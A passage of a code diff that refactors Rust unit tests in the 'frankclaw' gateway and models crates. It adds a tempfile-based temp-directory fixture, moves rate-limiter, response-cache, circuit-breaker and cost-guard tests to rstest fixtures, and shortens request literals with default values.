-        let _ = std::fs::remove_file(temp_dir.join("pairings.json"));
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
     #[tokio::test]

--- a/crates/frankclaw-gateway/src/methods.rs
+++ b/crates/frankclaw-gateway/src/methods.rs
@@ -896,7 +896,7 @@ fn parse_session_key_param(
 #[cfg(test)]
 mod tests {
     use std::collections::HashMap;
-    use std::path::PathBuf;
+    use std::path::Path;
     use std::sync::Arc;
 
     use async_trait::async_trait;
@@ -915,28 +915,9 @@ mod tests {
 
     use crate::delivery::{StoredReplyMetadata, set_last_reply_in_metadata};
     use crate::pairing::PairingStore;
+    use crate::test_fixtures::TestTempDir;
 
     use super::*;
-
-    // ── RAII guard for temp directories ──────────────────────────────
-
-    struct TempTestDir {
-        path: PathBuf,
-    }
-
-    impl TempTestDir {
-        fn new(label: &str) -> Self {
-            let path = std::env::temp_dir().join(format!("{}-{}", label, uuid::Uuid::new_v4()));
-            std::fs::create_dir_all(&path).expect("temp dir should create");
-            Self { path }
-        }
-    }
-
-    impl Drop for TempTestDir {
-        fn drop(&mut self) {
-            let _ = std::fs::remove_dir_all(&self.path);
-        }
-    }
 
     // ── Test helpers ─────────────────────────────────────────────────
 
@@ -1082,13 +1063,13 @@ mod tests {
     // ── State builders ───────────────────────────────────────────────
 
     async fn build_test_state(
-        temp_dir: &PathBuf,
+        temp_dir: &Path,
     ) -> (Arc<GatewayState>, Arc<SqliteSessionStore>) {
         build_test_state_with_providers(temp_dir, vec![Arc::new(MockProvider)]).await
     }
 
     async fn build_test_state_with_providers(
-        temp_dir: &PathBuf,
+        temp_dir: &Path,
         providers: Vec<Arc<dyn ModelProvider>>,
     ) -> (Arc<GatewayState>, Arc<SqliteSessionStore>) {
         std::fs::create_dir_all(temp_dir).expect("temp dir should exist");
@@ -1126,8 +1107,8 @@ mod tests {
 
     #[tokio::test]
     async fn sessions_get_returns_session_entry() {
-        let temp = TempTestDir::new("frankclaw-gateway-methods-get");
-        let (state, sessions) = build_test_state(&temp.path).await;
+        let temp = TestTempDir::new("frankclaw-gateway-methods-get");
+        let (state, sessions) = build_test_state(temp.path()).await;
         let session_key = SessionKey::from_raw("agent:main:web:default:user-1");
         let mut entry = make_session(session_key.clone());
         set_last_reply_in_metadata(
@@ -1171,8 +1152,8 @@ mod tests {
 
     #[tokio::test]
     async fn sessions_reset_clears_transcript_entries() {
-        let temp = TempTestDir::new("frankclaw-gateway-methods-reset");
-        let (state, sessions) = build_test_state(&temp.path).await;
+        let temp = TestTempDir::new("frankclaw-gateway-methods-reset");
+        let (state, sessions) = build_test_state(temp.path()).await;
         let session_key = SessionKey::from_raw("agent:main:web:default:user-1");
         sessions
             .upsert(&make_session(session_key.clone()))
@@ -1210,9 +1191,9 @@ mod tests {
 
     #[tokio::test]
     async fn chat_send_streams_delta_events_to_requesting_client() {
-        let temp = TempTestDir::new("frankclaw-gateway-methods-stream");
+        let temp = TestTempDir::new("frankclaw-gateway-methods-stream");
         let (state, _sessions) = build_test_state_with_providers(
-            &temp.path,
+            temp.path(),
             vec![Arc::new(StreamingMockProvider)],
         )
         .await;
@@ -1286,8 +1267,8 @@ mod tests {
 
     #[tokio::test]
     async fn webhooks_test_executes_runtime_chat() {
-        let temp = TempTestDir::new("frankclaw-gateway-methods-webhook");
-        let (state, sessions) = build_test_state(&temp.path).await;
+        let temp = TestTempDir::new("frankclaw-gateway-methods-webhook");
+        let (state, sessions) = build_test_state(temp.path()).await;
         let mut config = state.current_config().as_ref().clone();
         config.hooks.enabled = true;
         config.hooks.token = Some("secret".into());
@@ -1328,8 +1309,8 @@ mod tests {
 
     #[tokio::test]
     async fn canvas_set_creates_document() {
-        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-set");
-        let (state, _sessions) = build_test_state(&temp.path).await;
+        let temp = TestTempDir::new("frankclaw-gateway-methods-canvas-set");
+        let (state, _sessions) = build_test_state(temp.path()).await;
 
         let set_response = canvas_set(
             &state,
@@ -1362,8 +1343,8 @@ mod tests {
 
     #[tokio::test]
     async fn canvas_get_returns_document() {
-        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-get");
-        let (state, _sessions) = build_test_state(&temp.path).await;
+        let temp = TestTempDir::new("frankclaw-gateway-methods-canvas-get");
+        let (state, _sessions) = build_test_state(temp.path()).await;
         setup_canvas(&state).await;
 
         let get_response = canvas_get(
@@ -1393,8 +1374,8 @@ mod tests {
 
     #[tokio::test]
     async fn canvas_export_produces_markdown() {
-        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-export");
-        let (state, _sessions) = build_test_state(&temp.path).await;
+        let temp = TestTempDir::new("frankclaw-gateway-methods-canvas-export");
+        let (state, _sessions) = build_test_state(temp.path()).await;
         setup_canvas(&state).await;
 
         let export_response = canvas_export(
@@ -1426,8 +1407,8 @@ mod tests {
 
     #[tokio::test]
     async fn canvas_patch_appends_blocks() {
-        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-patch");
-        let (state, _sessions) = build_test_state(&temp.path).await;
+        let temp = TestTempDir::new("frankclaw-gateway-methods-canvas-patch");
+        let (state, _sessions) = build_test_state(temp.path()).await;
         setup_canvas(&state).await;
 
         let patch_response = canvas_patch(
@@ -1454,8 +1435,8 @@ mod tests {
 
     #[tokio::test]
     async fn canvas_clear_removes_document() {
-        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-clear");
-        let (state, _sessions) = build_test_state(&temp.path).await;
+        let temp = TestTempDir::new("frankclaw-gateway-methods-canvas-clear");
+        let (state, _sessions) = build_test_state(temp.path()).await;
         setup_canvas(&state).await;
 
         let clear_response = canvas_clear(

--- a/crates/frankclaw-gateway/src/rate_limit.rs
+++ b/crates/frankclaw-gateway/src/rate_limit.rs
@@ -89,18 +89,19 @@ impl AuthRateLimiter {
 mod tests {
     use super::*;
     use std::net::Ipv4Addr;
+    use rstest::{rstest, fixture};
 
-    fn test_config() -> RateLimitConfig {
-        RateLimitConfig {
+    #[fixture]
+    fn limiter() -> AuthRateLimiter {
+        AuthRateLimiter::new(RateLimitConfig {
             max_attempts: 3,
             window_secs: 60,
             lockout_secs: 300,
-        }
+        })
     }
 
-    #[test]
-    fn allows_under_limit() {
-        let limiter = AuthRateLimiter::new(test_config());
+    #[rstest]
+    fn allows_under_limit(limiter: AuthRateLimiter) {
         let ip = IpAddr::V4(Ipv4Addr::new(1, 2, 3, 4));
 
         limiter.record_failure(&ip);
@@ -108,9 +109,8 @@ mod tests {
         assert!(limiter.is_locked(&ip).is_none());
     }
 
-    #[test]
-    fn locks_at_limit() {
-        let limiter = AuthRateLimiter::new(test_config());
+    #[rstest]
+    fn locks_at_limit(limiter: AuthRateLimiter) {
         let ip = IpAddr::V4(Ipv4Addr::new(1, 2, 3, 4));
 
         for _ in 0..3 {
@@ -119,9 +119,8 @@ mod tests {
         assert!(limiter.is_locked(&ip).is_some());
     }
 
-    #[test]
-    fn success_clears() {
-        let limiter = AuthRateLimiter::new(test_config());
+    #[rstest]
+    fn success_clears(limiter: AuthRateLimiter) {
         let ip = IpAddr::V4(Ipv4Addr::new(1, 2, 3, 4));
 
         for _ in 0..3 {

--- a/crates/frankclaw-gateway/src/test_fixtures.rs
+++ b/crates/frankclaw-gateway/src/test_fixtures.rs
@@ -1,0 +1,21 @@
+use std::path::Path;
+
+use tempfile::{Builder, TempDir};
+
+pub(crate) struct TestTempDir {
+    dir: TempDir,
+}
+
+impl TestTempDir {
+    pub(crate) fn new(prefix: &str) -> Self {
+        let dir = Builder::new()
+            .prefix(prefix)
+            .tempdir()
+            .expect("temp dir should create");
+        Self { dir }
+    }
+
+    pub(crate) fn path(&self) -> &Path {
+        self.dir.path()
+    }
+}

--- a/crates/frankclaw-models/Cargo.toml
+++ b/crates/frankclaw-models/Cargo.toml
@@ -21,3 +21,6 @@ rand = { workspace = true }
 sha2 = { workspace = true }
 regex = { workspace = true }
 strum = { workspace = true }
+
+[dev-dependencies]
+rstest = { workspace = true }

--- a/crates/frankclaw-models/src/anthropic.rs
+++ b/crates/frankclaw-models/src/anthropic.rs
@@ -721,13 +721,8 @@ mod tests {
             messages: vec![CompletionMessage::text(Role::User, "think hard")],
             max_tokens: Some(4096),
             temperature: Some(0.5),
-            system: None,
-            tools: vec![],
             thinking_budget: Some(10000),
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         assert_eq!(body["thinking"]["type"], "enabled");
@@ -743,13 +738,7 @@ mod tests {
             messages: vec![CompletionMessage::text(Role::User, "hello")],
             max_tokens: Some(4096),
             temperature: Some(0.7),
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         assert!(body.get("thinking").is_none());
@@ -771,14 +760,7 @@ mod tests {
                 }],
             )],
             max_tokens: Some(4096),
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         let msg = &body["messages"][0];
@@ -812,14 +794,7 @@ mod tests {
                 ],
             )],
             max_tokens: Some(4096),
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         let content = body["messages"][0]["content"]
@@ -836,14 +811,7 @@ mod tests {
             model_id: "claude-sonnet-4-6".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
             max_tokens: Some(4096),
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         let msg = &body["messages"][0];
@@ -857,14 +825,8 @@ mod tests {
             model_id: "claude-sonnet-4-6".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
             max_tokens: Some(4096),
-            temperature: None,
             system: Some("You are a helpful assistant.".into()),
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
 
@@ -882,14 +844,7 @@ mod tests {
             model_id: "claude-sonnet-4-6".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
             max_tokens: Some(4096),
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         assert!(body.get("system").is_none());

--- a/crates/frankclaw-models/src/cache.rs
+++ b/crates/frankclaw-models/src/cache.rs
@@ -228,15 +228,7 @@ mod tests {
         CompletionRequest {
             model_id: "test-model".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
-            max_tokens: None,
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         }
     }
 
@@ -245,15 +237,7 @@ mod tests {
         CompletionRequest {
             model_id: "test-model".into(),
             messages: vec![CompletionMessage::text(Role::User, "goodbye")],
-            max_tokens: None,
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         }
     }
 
@@ -262,20 +246,13 @@ mod tests {
         CompletionRequest {
             model_id: "test-model".into(),
             messages: vec![CompletionMessage::text(Role::User, "use tool")],
-            max_tokens: None,
-            temperature: None,
-            system: None,
             tools: vec![ToolDef {
                 name: "test_tool".into(),
                 description: "a tool".into(),
                 parameters: serde_json::json!({}),
                 risk_level: Default::default(),
             }],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         }
     }
 
@@ -424,15 +401,7 @@ mod tests {
         let third = CompletionRequest {
             model_id: "test-model".into(),
             messages: vec![CompletionMessage::text(Role::User, "third")],
-            max_tokens: None,
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         cache.store(&third, &dummy_response);
         assert_eq!(cache.len(), 2);

--- a/crates/frankclaw-models/src/cache.rs
+++ b/crates/frankclaw-models/src/cache.rs
@@ -216,7 +216,14 @@ mod tests {
     use super::*;
     use frankclaw_core::model::{CompletionMessage, FinishReason, ToolDef, Usage};
     use frankclaw_core::types::Role;
+    use rstest::{fixture, rstest};
 
+    #[fixture]
+    fn cache() -> ResponseCache {
+        ResponseCache::new(ResponseCacheConfig::default())
+    }
+
+    #[fixture]
     fn simple_request() -> CompletionRequest {
         CompletionRequest {
             model_id: "test-model".into(),
@@ -233,6 +240,7 @@ mod tests {
         }
     }
 
+    #[fixture]
     fn different_request() -> CompletionRequest {
         CompletionRequest {
             model_id: "test-model".into(),
@@ -249,6 +257,7 @@ mod tests {
         }
     }
 
+    #[fixture]
     fn tool_request() -> CompletionRequest {
         CompletionRequest {
             model_id: "test-model".into(),
@@ -270,6 +279,7 @@ mod tests {
         }
     }
 
+    #[fixture]
     fn dummy_response() -> CompletionResponse {
         CompletionResponse {
             content: "cached response".into(),
@@ -284,123 +294,130 @@ mod tests {
         }
     }
 
-    #[test]
-    fn cache_key_is_deterministic() {
-        let req = simple_request();
-        let k1 = cache_key(&req);
-        let k2 = cache_key(&req);
+    #[rstest]
+    fn cache_key_is_deterministic(simple_request: CompletionRequest) {
+        let k1 = cache_key(&simple_request);
+        let k2 = cache_key(&simple_request);
         assert_eq!(k1, k2);
         assert_eq!(k1.len(), 64); // SHA-256 hex
     }
 
-    #[test]
-    fn cache_key_varies_by_model() {
-        let mut req_a = simple_request();
-        let mut req_b = simple_request();
+    #[rstest]
+    fn cache_key_varies_by_model(mut simple_request: CompletionRequest) {
+        let mut req_b = simple_request.clone();
         req_b.model_id = "other-model".into();
-        assert_ne!(cache_key(&req_a), cache_key(&req_b));
-        req_a.model_id = req_b.model_id.clone();
-        assert_eq!(cache_key(&req_a), cache_key(&req_b));
+        assert_ne!(cache_key(&simple_request), cache_key(&req_b));
+        simple_request.model_id = req_b.model_id.clone();
+        assert_eq!(cache_key(&simple_request), cache_key(&req_b));
     }
 
-    #[test]
-    fn cache_key_varies_by_messages() {
+    #[rstest]
+    fn cache_key_varies_by_messages(
+        simple_request: CompletionRequest,
+        different_request: CompletionRequest,
+    ) {
         assert_ne!(
-            cache_key(&simple_request()),
-            cache_key(&different_request())
+            cache_key(&simple_request),
+            cache_key(&different_request)
         );
     }
 
-    #[test]
-    fn cache_key_varies_by_temperature() {
-        let mut req_a = simple_request();
+    #[rstest]
+    fn cache_key_varies_by_temperature(simple_request: CompletionRequest) {
+        let mut req_a = simple_request.clone();
         req_a.temperature = Some(0.0);
-        let mut req_b = simple_request();
+        let mut req_b = simple_request;
         req_b.temperature = Some(1.0);
         assert_ne!(cache_key(&req_a), cache_key(&req_b));
     }
 
-    #[test]
-    fn cache_key_varies_by_max_tokens() {
-        let mut req_a = simple_request();
+    #[rstest]
+    fn cache_key_varies_by_max_tokens(simple_request: CompletionRequest) {
+        let mut req_a = simple_request.clone();
         req_a.max_tokens = Some(100);
-        let mut req_b = simple_request();
+        let mut req_b = simple_request;
         req_b.max_tokens = Some(500);
         assert_ne!(cache_key(&req_a), cache_key(&req_b));
     }
 
-    #[test]
-    fn cache_key_varies_by_system_prompt() {
-        let mut req_a = simple_request();
+    #[rstest]
+    fn cache_key_varies_by_system_prompt(simple_request: CompletionRequest) {
+        let mut req_a = simple_request.clone();
         req_a.system = Some("system A".into());
-        let mut req_b = simple_request();
+        let mut req_b = simple_request;
         req_b.system = Some("system B".into());
         assert_ne!(cache_key(&req_a), cache_key(&req_b));
     }
 
-    #[test]
-    fn cache_hit_returns_stored_response() {
-        let cache = ResponseCache::new(ResponseCacheConfig::default());
-        let req = simple_request();
-        let resp = dummy_response();
-
-        assert!(cache.lookup(&req).is_none());
-        cache.store(&req, &resp);
-        let cached = cache.lookup(&req).expect("should hit cache");
+    #[rstest]
+    fn cache_hit_returns_stored_response(
+        cache: ResponseCache,
+        simple_request: CompletionRequest,
+        dummy_response: CompletionResponse,
+    ) {
+        assert!(cache.lookup(&simple_request).is_none());
+        cache.store(&simple_request, &dummy_response);
+        let cached = cache.lookup(&simple_request).expect("should hit cache");
         assert_eq!(cached.content, "cached response");
         assert_eq!(cache.total_hits(), 1);
     }
 
-    #[test]
-    fn different_messages_get_different_entries() {
-        let cache = ResponseCache::new(ResponseCacheConfig::default());
-        let resp = dummy_response();
-
-        cache.store(&simple_request(), &resp);
-        cache.store(&different_request(), &resp);
+    #[rstest]
+    fn different_messages_get_different_entries(
+        cache: ResponseCache,
+        simple_request: CompletionRequest,
+        different_request: CompletionRequest,
+        dummy_response: CompletionResponse,
+    ) {
+        cache.store(&simple_request, &dummy_response);
+        cache.store(&different_request, &dummy_response);
         assert_eq!(cache.len(), 2);
     }
 
-    #[test]
-    fn tool_requests_are_never_cached() {
-        let cache = ResponseCache::new(ResponseCacheConfig::default());
-        let req = tool_request();
-        let resp = dummy_response();
-
-        cache.store(&req, &resp);
+    #[rstest]
+    fn tool_requests_are_never_cached(
+        cache: ResponseCache,
+        tool_request: CompletionRequest,
+        dummy_response: CompletionResponse,
+    ) {
+        cache.store(&tool_request, &dummy_response);
         assert!(cache.is_empty(), "tool requests should not be stored");
-        assert!(cache.lookup(&req).is_none());
+        assert!(cache.lookup(&tool_request).is_none());
     }
 
-    #[test]
-    fn expired_entries_are_evicted() {
+    #[rstest]
+    fn expired_entries_are_evicted(
+        simple_request: CompletionRequest,
+        dummy_response: CompletionResponse,
+    ) {
         let cache = ResponseCache::new(ResponseCacheConfig {
             ttl: Duration::from_millis(1),
             max_entries: 100,
         });
-        let req = simple_request();
-        let resp = dummy_response();
 
-        cache.store(&req, &resp);
+        cache.store(&simple_request, &dummy_response);
         assert_eq!(cache.len(), 1);
 
         // Wait for TTL to expire
         std::thread::sleep(Duration::from_millis(10));
 
         // Should be a cache miss now
-        assert!(cache.lookup(&req).is_none());
+        assert!(cache.lookup(&simple_request).is_none());
     }
 
-    #[test]
-    fn lru_eviction_removes_oldest() {
+    #[rstest]
+    fn lru_eviction_removes_oldest(
+        simple_request: CompletionRequest,
+        different_request: CompletionRequest,
+        dummy_response: CompletionResponse,
+    ) {
         let cache = ResponseCache::new(ResponseCacheConfig {
             ttl: Duration::from_secs(60),
             max_entries: 2,
         });
-        let resp = dummy_response();
 
-        cache.store(&simple_request(), &resp);
-        cache.store(&different_request(), &resp);
+        cache.store(&simple_request, &dummy_response);
+        cache.store(&different_request, &dummy_response);
         assert_eq!(cache.len(), 2);
 
         // Third entry should evict the oldest
@@ -417,35 +434,41 @@ mod tests {
             response_format: None,
             reasoning_effort: None,
         };
-        cache.store(&third, &resp);
+        cache.store(&third, &dummy_response);
         assert_eq!(cache.len(), 2);
     }
 
-    #[test]
-    fn clear_empties_cache() {
-        let cache = ResponseCache::new(ResponseCacheConfig::default());
-        cache.store(&simple_request(), &dummy_response());
+    #[rstest]
+    fn clear_empties_cache(
+        cache: ResponseCache,
+        simple_request: CompletionRequest,
+        dummy_response: CompletionResponse,
+    ) {
+        cache.store(&simple_request, &dummy_response);
         assert_eq!(cache.len(), 1);
 
         cache.clear();
         assert!(cache.is_empty());
     }
 
-    #[test]
-    fn total_hits_survives_eviction() {
+    #[rstest]
+    fn total_hits_survives_eviction(
+        simple_request: CompletionRequest,
+        different_request: CompletionRequest,
+        dummy_response: CompletionResponse,
+    ) {
         let cache = ResponseCache::new(ResponseCacheConfig {
             ttl: Duration::from_secs(60),
             max_entries: 1,
         });
-        let resp = dummy_response();
 
         // Populate and score a hit
-        cache.store(&simple_request(), &resp);
-        cache.lookup(&simple_request());
+        cache.store(&simple_request, &dummy_response);
+        cache.lookup(&simple_request);
         assert_eq!(cache.total_hits(), 1);
 
         // Evict by adding a different entry
-        cache.store(&different_request(), &resp);
+        cache.store(&different_request, &dummy_response);
         assert_eq!(cache.len(), 1);
         assert_eq!(cache.total_hits(), 1, "hit count survives eviction");
     }

--- a/crates/frankclaw-models/src/circuit_breaker.rs
+++ b/crates/frankclaw-models/src/circuit_breaker.rs
@@ -147,103 +147,98 @@ fn maybe_transition_to_half_open(s: &mut BreakerState, config: &CircuitBreakerCo
 #[cfg(test)]
 mod tests {
     use super::*;
+    use rstest::{fixture, rstest};
 
-    fn test_config() -> CircuitBreakerConfig {
-        CircuitBreakerConfig {
+    #[fixture]
+    fn breaker() -> CircuitBreaker {
+        CircuitBreaker::new(CircuitBreakerConfig {
             failure_threshold: 3,
             recovery_timeout: Duration::from_millis(50),
             half_open_successes_needed: 2,
-        }
+        })
     }
 
-    #[test]
-    fn closed_allows_calls_and_resets_on_success() {
-        let cb = CircuitBreaker::new(test_config());
-        assert!(cb.check_allowed());
-        assert_eq!(cb.circuit_state(), CircuitState::Closed);
+    #[rstest]
+    fn closed_allows_calls_and_resets_on_success(breaker: CircuitBreaker) {
+        assert!(breaker.check_allowed());
+        assert_eq!(breaker.circuit_state(), CircuitState::Closed);
 
-        cb.record_failure();
-        cb.record_failure();
-        assert_eq!(cb.consecutive_failures(), 2);
+        breaker.record_failure();
+        breaker.record_failure();
+        assert_eq!(breaker.consecutive_failures(), 2);
 
-        cb.record_success();
-        assert_eq!(cb.consecutive_failures(), 0);
-        assert_eq!(cb.circuit_state(), CircuitState::Closed);
+        breaker.record_success();
+        assert_eq!(breaker.consecutive_failures(), 0);
+        assert_eq!(breaker.circuit_state(), CircuitState::Closed);
     }
 
-    #[test]
-    fn failures_trip_circuit_to_open() {
-        let cb = CircuitBreaker::new(test_config());
+    #[rstest]
+    fn failures_trip_circuit_to_open(breaker: CircuitBreaker) {
         for _ in 0..3 {
-            cb.record_failure();
+            breaker.record_failure();
         }
-        assert_eq!(cb.circuit_state(), CircuitState::Open);
-        assert!(!cb.check_allowed());
+        assert_eq!(breaker.circuit_state(), CircuitState::Open);
+        assert!(!breaker.check_allowed());
     }
 
-    #[test]
-    fn open_rejects_immediately() {
-        let cb = CircuitBreaker::new(test_config());
+    #[rstest]
+    fn open_rejects_immediately(breaker: CircuitBreaker) {
         for _ in 0..3 {
-            cb.record_failure();
+            breaker.record_failure();
         }
-        assert!(!cb.check_allowed());
+        assert!(!breaker.check_allowed());
     }
 
-    #[test]
-    fn recovery_timeout_transitions_to_half_open() {
-        let cb = CircuitBreaker::new(test_config());
+    #[rstest]
+    fn recovery_timeout_transitions_to_half_open(breaker: CircuitBreaker) {
         for _ in 0..3 {
-            cb.record_failure();
+            breaker.record_failure();
         }
-        assert_eq!(cb.circuit_state(), CircuitState::Open);
+        assert_eq!(breaker.circuit_state(), CircuitState::Open);
 
         std::thread::sleep(Duration::from_millis(60));
-        assert_eq!(cb.circuit_state(), CircuitState::HalfOpen);
-        assert!(cb.check_allowed());
+        assert_eq!(breaker.circuit_state(), CircuitState::HalfOpen);
+        assert!(breaker.check_allowed());
     }
 
-    #[test]
-    fn half_open_success_closes_circuit() {
-        let cb = CircuitBreaker::new(test_config());
+    #[rstest]
+    fn half_open_success_closes_circuit(breaker: CircuitBreaker) {
         for _ in 0..3 {
-            cb.record_failure();
+            breaker.record_failure();
         }
         std::thread::sleep(Duration::from_millis(60));
 
-        assert_eq!(cb.circuit_state(), CircuitState::HalfOpen);
-        cb.record_success();
-        assert_eq!(cb.circuit_state(), CircuitState::HalfOpen); // Needs 2
-        cb.record_success();
-        assert_eq!(cb.circuit_state(), CircuitState::Closed);
+        assert_eq!(breaker.circuit_state(), CircuitState::HalfOpen);
+        breaker.record_success();
+        assert_eq!(breaker.circuit_state(), CircuitState::HalfOpen); // Needs 2
+        breaker.record_success();
+        assert_eq!(breaker.circuit_state(), CircuitState::Closed);
     }
 
-    #[test]
-    fn half_open_failure_reopens_circuit() {
-        let cb = CircuitBreaker::new(test_config());
+    #[rstest]
+    fn half_open_failure_reopens_circuit(breaker: CircuitBreaker) {
         for _ in 0..3 {
-            cb.record_failure();
+            breaker.record_failure();
         }
         std::thread::sleep(Duration::from_millis(60));
 
-        assert_eq!(cb.circuit_state(), CircuitState::HalfOpen);
-        cb.record_failure();
-        assert_eq!(cb.circuit_state(), CircuitState::Open);
-        assert!(!cb.check_allowed());
+        assert_eq!(breaker.circuit_state(), CircuitState::HalfOpen);
+        breaker.record_failure();
+        assert_eq!(breaker.circuit_state(), CircuitState::Open);
+        assert!(!breaker.check_allowed());
     }
 
-    #[test]
-    fn success_in_closed_resets_failure_count() {
-        let cb = CircuitBreaker::new(test_config());
-        cb.record_failure();
-        cb.record_failure();
-        assert_eq!(cb.consecutive_failures(), 2);
-        cb.record_success();
-        assert_eq!(cb.consecutive_failures(), 0);
+    #[rstest]
+    fn success_in_closed_resets_failure_count(breaker: CircuitBreaker) {
+        breaker.record_failure();
+        breaker.record_failure();
+        assert_eq!(breaker.consecutive_failures(), 2);
+        breaker.record_success();
+        assert_eq!(breaker.consecutive_failures(), 0);
         // Two more failures should NOT trip (we're back at 0).
-        cb.record_failure();
-        cb.record_failure();
-        assert_eq!(cb.circuit_state(), CircuitState::Closed);
+        breaker.record_failure();
+        breaker.record_failure();
+        assert_eq!(breaker.circuit_state(), CircuitState::Closed);
     }
 
     #[test]

--- a/crates/frankclaw-models/src/cost_guard.rs
+++ b/crates/frankclaw-models/src/cost_guard.rs
@@ -239,30 +239,52 @@ fn to_cents(usd: f64) -> u64 {
 #[cfg(test)]
 mod tests {
     use super::*;
+    use rstest::{fixture, rstest};
 
-    #[tokio::test]
-    async fn unlimited_allows_everything() {
-        let guard = CostGuard::new(CostGuardConfig::default());
-        assert!(guard.check_allowed().await.is_ok());
-
-        guard.record_llm_call("gpt-4o", 100_000, 100_000).await;
-        assert!(guard.check_allowed().await.is_ok());
+    #[fixture]
+    fn unlimited_guard() -> CostGuard {
+        CostGuard::new(CostGuardConfig::default())
     }
 
-    #[tokio::test]
-    async fn daily_budget_enforcement() {
-        let guard = CostGuard::new(CostGuardConfig {
-            max_cost_per_day_cents: Some(1), // $0.01 limit
+    #[fixture]
+    fn daily_budget_guard() -> CostGuard {
+        CostGuard::new(CostGuardConfig {
+            max_cost_per_day_cents: Some(1),
             max_actions_per_hour: None,
-        });
+        })
+    }
 
-        assert!(guard.check_allowed().await.is_ok());
+    #[fixture]
+    fn hourly_rate_guard() -> CostGuard {
+        CostGuard::new(CostGuardConfig {
+            max_cost_per_day_cents: None,
+            max_actions_per_hour: Some(3),
+        })
+    }
+
+    #[rstest]
+    #[tokio::test]
+    async fn unlimited_allows_everything(unlimited_guard: CostGuard) {
+        assert!(unlimited_guard.check_allowed().await.is_ok());
+
+        unlimited_guard
+            .record_llm_call("gpt-4o", 100_000, 100_000)
+            .await;
+        assert!(unlimited_guard.check_allowed().await.is_ok());
+    }
+
+    #[rstest]
+    #[tokio::test]
+    async fn daily_budget_enforcement(daily_budget_guard: CostGuard) {
+        assert!(daily_budget_guard.check_allowed().await.is_ok());
 
         // gpt-4o: input=$0.0000025/tok, output=$0.00001/tok
         // 10000 input + 10000 output ≈ $0.125 >> $0.01
-        guard.record_llm_call("gpt-4o", 10_000, 10_000).await;
+        daily_budget_guard
+            .record_llm_call("gpt-4o", 10_000, 10_000)
+            .await;
 
-        let result = guard.check_allowed().await;
+        let result = daily_budget_guard.check_allowed().await;
         assert!(result.is_err());
         match result.unwrap_err() {
             CostLimitExceeded::DailyBudget { limit_cents, .. } => {
@@ -272,19 +294,15 @@ mod tests {
         }
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn hourly_rate_enforcement() {
-        let guard = CostGuard::new(CostGuardConfig {
-            max_cost_per_day_cents: None,
-            max_actions_per_hour: Some(3),
-        });
-
+    async fn hourly_rate_enforcement(hourly_rate_guard: CostGuard) {
         for _ in 0..3 {
-            assert!(guard.check_allowed().await.is_ok());
-            guard.record_llm_call("gpt-4o", 10, 10).await;
+            assert!(hourly_rate_guard.check_allowed().await.is_ok());
+            hourly_rate_guard.record_llm_call("gpt-4o", 10, 10).await;
         }
 
-        let result = guard.check_allowed().await;
+        let result = hourly_rate_guard.check_allowed().await;
         assert!(result.is_err());
         match result.unwrap_err() {
             CostLimitExceeded::HourlyRate { actions, limit } => {
@@ -295,38 +313,42 @@ mod tests {
         }
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn daily_spend_tracking() {
-        let guard = CostGuard::new(CostGuardConfig::default());
-        assert_eq!(guard.daily_spend().await, 0.0);
+    async fn daily_spend_tracking(unlimited_guard: CostGuard) {
+        assert_eq!(unlimited_guard.daily_spend().await, 0.0);
 
-        let cost = guard.record_llm_call("gpt-4o", 1000, 500).await;
+        let cost = unlimited_guard
+            .record_llm_call("gpt-4o", 1000, 500)
+            .await;
         assert!(cost > 0.0);
-        assert_eq!(guard.daily_spend().await, cost);
+        assert_eq!(unlimited_guard.daily_spend().await, cost);
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn actions_this_hour_tracking() {
-        let guard = CostGuard::new(CostGuardConfig::default());
-        assert_eq!(guard.actions_this_hour().await, 0);
+    async fn actions_this_hour_tracking(unlimited_guard: CostGuard) {
+        assert_eq!(unlimited_guard.actions_this_hour().await, 0);
 
-        guard.record_llm_call("gpt-4o", 10, 10).await;
-        guard.record_llm_call("gpt-4o", 10, 10).await;
